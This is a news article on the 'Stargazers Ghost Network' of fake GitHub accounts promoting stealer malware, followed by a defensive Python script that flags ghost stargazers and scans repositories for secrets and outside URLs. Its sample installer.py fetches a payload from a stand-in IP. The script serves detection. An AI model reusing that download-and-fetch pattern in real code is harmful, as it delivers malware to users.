A covert network of around 3,000 "ghost" accounts on GitHub has been discovered abusing the code-hosting platform to promote malware and phishing links. A recent investigation by cybersecurity firm Check Point uncovered the activities of a cybercriminal group that researchers have dubbed "Stargazer Goblin."
Stargazer Goblin has been active on Microsoft-owned GitHub, the world's largest open-source code repository, since at least June 2023. The site hosts the projects of millions of developers, and Stargazer Goblin has used its community features, such as starring and forking, to lend visibility and apparent legitimacy to its malicious repositories.
Antonis Terefos, the malware reverse engineer at Check Point who found the network, highlighted the sophistication of the operation, noting that while GitHub has been targeted by cybercriminals before, the scale and method of this operation are unprecedented.
The repositories and stars are bought and sold through cybercrime-related Telegram channels and various criminal marketplaces. Telegram is commonly used by cybercriminals, their customers and their victims. Terefos said he has not previously seen a network of fake accounts of this kind operating on GitHub.
The network, which Check Point calls the Stargazers Ghost Network, distributes malware disguised as legitimate tools for social media, gaming and cryptocurrency applications, as well as code purporting to run a VPN or to license software such as Adobe Photoshop. These repositories target Windows users looking for free software online.
The network charges other hackers a fee for its services. Check Point identified several malware families distributed through the network, including Atlantida Stealer, Rhadamanthys and Lumma Stealer. Terefos discovered the network while investigating infections involving Atlantida Stealer.
Stargazer Goblin advertises on cybercrime forums and runs a Telegram channel offering 100 stars for $10 and 500 stars for $50. It also clones existing repositories and supplies trusted-looking accounts. According to Check Point's analysis, the network may have earned as much as $100,000 since it began these operations, possibly as early as August 2022. Between mid-May and mid-June of this year alone, the operator reportedly made around $8,000.
Terefos has also observed legitimate repositories being hijacked with stolen credentials and turned into malicious ones. If legitimate users fork these compromised repositories, the malicious code can spread further. Automated tools help Terefos identify accounts linked to the network by spotting shared traits such as similar profile templates and tags.
When GitHub identifies accounts that support illegal malware campaigns, it disables them for violating its terms of service. Alexis Wales, GitHub's vice president of security operations, said the company has dedicated teams to detect and remove such content and accounts, using a combination of manual review and large-scale, machine-learning-based detection to identify suspicious behavior.
GitHub is, however, a large target: with over 100 million users and 420 million repositories, it is not hard for cybercriminals to hide within the user base like grains of sand on a beach.
Jake Moore, global cybersecurity advisor at security firm Eset, warned GitHub users about the risks of downloading malicious code. Signs of a malicious repository include sudden code changes, code that reaches out to external resources, and hard-coded credentials or API keys.
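The two warning signs described above, bulk-created stargazer accounts that share a profile template and repository contents that contact outside hosts or embed credentials, can be checked mechanically. The script below is an added example written for this article; it is not Check Point's tooling, GitHub's detection, or anything Eset published. The account-scoring thresholds (age under 90 days, at most one public repository, zero followers), the secret patterns, the trusted-host list, and all sample accounts and files are this example's own assumptions and constructed data.

```python
"""Added example: flag 'ghost' stargazers sharing a profile template, and scan
repository files for external URLs and hard-coded credentials. Thresholds and
sample data are assumptions constructed for this example, not real accounts."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timedelta
from urllib.parse import urlparse


@dataclass
class Account:
    """Subset of the fields GitHub's /users/{login} endpoint returns."""
    login: str
    created_at: datetime
    public_repos: int
    followers: int
    bio: str  # bulk-created accounts often share one profile template


def ghost_account_score(acct: Account, now: datetime) -> int:
    """One point per trait assumed typical of a throwaway account: very new,
    almost no repositories, no followers. 0 = looks organic, 3 = bulk-created."""
    score = 0
    if now - acct.created_at < timedelta(days=90):
        score += 1
    if acct.public_repos <= 1:
        score += 1
    if acct.followers == 0:
        score += 1
    return score


def flag_ghost_stargazers(stargazers: list[Account], now: datetime,
                          threshold: int = 2, min_shared: int = 3) -> dict:
    """Flag stargazers scoring at or above `threshold`, then look for the
    'same template' trait (a bio shared by >= `min_shared` flagged accounts)
    and how tightly the flagged accounts' creation dates cluster."""
    flagged = [a for a in stargazers if ghost_account_score(a, now) >= threshold]
    bios = Counter(a.bio for a in flagged if a.bio)
    shared_bio = None
    if bios:
        bio, count = bios.most_common(1)[0]
        if count >= min_shared:
            shared_bio = bio
    span = 0
    if flagged:
        dates = [a.created_at for a in flagged]
        span = (max(dates) - min(dates)).days
    return {
        "flagged": [a.login for a in flagged],
        "ratio": len(flagged) / len(stargazers) if stargazers else 0.0,
        "shared_bio": shared_bio,
        "creation_span_days": span,
    }


# Assumed credential patterns (AWS key id, GitHub token, generic KEY = "...").
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "github_token": re.compile(r"gh[pousr]_[A-Za-z0-9]{36,}"),
    "generic_secret": re.compile(
        r"(?i)(api[_-]?key|secret|password|token)\s*[=:]\s*['\"][^'\"]{8,}['\"]"),
}
URL_PATTERN = re.compile(r"https?://[^\s'\"<>)]+")
# Hosts a build script may legitimately contact (assumed); others are reported.
TRUSTED_HOSTS = {"github.com", "raw.githubusercontent.com", "pypi.org"}


def scan_repo_files(files: dict[str, str]) -> dict[str, list]:
    """`files` maps a path to its text. Returns credential hits as
    (path, pattern_name) and URLs to untrusted hosts as (path, url)."""
    secrets: set[tuple[str, str]] = set()
    urls: list[tuple[str, str]] = []
    for path, text in files.items():
        for name, pattern in SECRET_PATTERNS.items():
            if pattern.search(text):
                secrets.add((path, name))
        for m in URL_PATTERN.finditer(text):
            host = urlparse(m.group(0)).hostname or ""
            if host not in TRUSTED_HOSTS:
                urls.append((path, m.group(0)))
    return {"hardcoded_secrets": sorted(secrets), "external_urls": urls}


# Constructed sample data: two organic-looking accounts and four that were
# created within two days of each other with an identical bio.
NOW = datetime(2024, 6, 15)
SAMPLE_STARGAZERS = [
    Account("dev-alice", datetime(2016, 3, 2), 42, 120, "Backend engineer"),
    Account("bob-writes-code", datetime(2019, 11, 20), 17, 35, ""),
    Account("brightstar8821", datetime(2024, 5, 30), 0, 0, "Software enthusiast | Open source lover"),
    Account("brightstar8822", datetime(2024, 5, 30), 0, 0, "Software enthusiast | Open source lover"),
    Account("sunnyrepo0193", datetime(2024, 5, 31), 1, 0, "Software enthusiast | Open source lover"),
    Account("moonfork3371", datetime(2024, 5, 31), 0, 0, "Software enthusiast | Open source lover"),
]
# Constructed repository: an installer fetching a payload from a documentation
# IP range and a config file with AWS's published example access key id.
SAMPLE_FILES = {
    "installer.py": "import urllib.request\n"
                    "payload = urllib.request.urlopen('http://203.0.113.7/update.bin').read()\n",
    "config.py": 'API_KEY = "AKIAIOSFODNN7EXAMPLE"\n',
    "README.md": "Build instructions: see https://github.com/example/example\n",
}

if __name__ == "__main__":
    print(flag_ghost_stargazers(SAMPLE_STARGAZERS, NOW))
    print(scan_repo_files(SAMPLE_FILES))
```

Against the sample data, four of six stargazers are flagged, all four share one bio and were created within a day of each other, and the scan reports the external download host and the hard-coded key. Fed real data from the GitHub API (stargazers and user profiles, plus a checkout of the repository), the same functions give a quick triage signal; the thresholds are starting points to tune, not verdicts.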
The Stargazer Goblin network may be even more widespread, with YouTube accounts also sharing malicious links through their videos, and Terefos stresses that the full extent of the network's activities is not yet understood.